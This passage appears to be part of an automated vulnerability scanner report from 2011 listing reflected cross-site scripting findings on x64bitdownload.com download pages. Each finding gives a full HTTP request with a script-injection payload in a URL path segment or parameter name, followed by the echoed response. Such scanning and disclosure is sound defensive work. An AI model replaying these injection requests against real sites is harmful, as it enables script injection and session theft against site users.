<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0"/>
...[SNIP]...

4.1776. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1902c"><script>alert(1)</script>78f4ba71bdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html?1902c"><script>alert(1)</script>78f4ba71bdf=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-usenext-download-rizftkeg.html?1902c"><script>alert(1)</script>78f4ba71bdf=1"/>
...[SNIP]...

4.1777. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f97a2"><script>alert(1)</script>fe238360768 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html" />
...[SNIP]...

4.1778. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22641"><script>alert(1)</script>a78c23ad14d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d"/>
...[SNIP]...

4.1779. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3401b"><script>alert(1)</script>d76e63f7bc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1"/>
...[SNIP]...

4.1780. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9493"><script>alert(1)</script>26deef30248 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html" />
...[SNIP]...

4.1781. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f12c"><script>alert(1)</script>5499298239f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f"/>
...[SNIP]...

4.1782. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d77d"><script>alert(1)</script>3841192b652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54569


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1"/>
...[SNIP]...

4.1783. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3aef"><script>alert(1)</script>f4e866e47d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html" />
...[SNIP]...

4.1784. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecd4d"><script>alert(1)</script>4b44f8919a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7"/>
...[SNIP]...

4.1785. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f31"><script>alert(1)</script>a68db57adbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52874


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1"/>
...[SNIP]...

4.1786. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c74"><script>alert(1)</script>9bb43158f8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html" />
...[SNIP]...

4.1787. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b3f8"><script>alert(1)</script>275bf41d948 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html7b3f8"><script>alert(1)</script>275bf41d948"/>
...[SNIP]...

4.1788. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f529"><script>alert(1)</script>0751029a53e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html?5f529"><script>alert(1)</script>0751029a53e=1"/>
...[SNIP]...

4.1789. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52513"><script>alert(1)</script>afca5fe7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:23:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads52513"><script>alert(1)</script>afca5fe7516/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html" />
...[SNIP]...

4.1790. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>33bac6575a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.htmlb6937"><script>alert(1)</script>33bac6575a4"/>
...[SNIP]...

4.1791. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1f66"><script>alert(1)</script>7df9bf07e5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>7df9bf07e5d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>7df9bf07e5d=1"/>
...[SNIP]...

4.1792. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9633"><script>alert(1)</script>8efe63aeaeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse9633"><script>alert(1)</script>8efe63aeaeb/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse9633"><script>alert(1)</script>8efe63aeaeb/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html" />
...[SNIP]...

4.1793. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
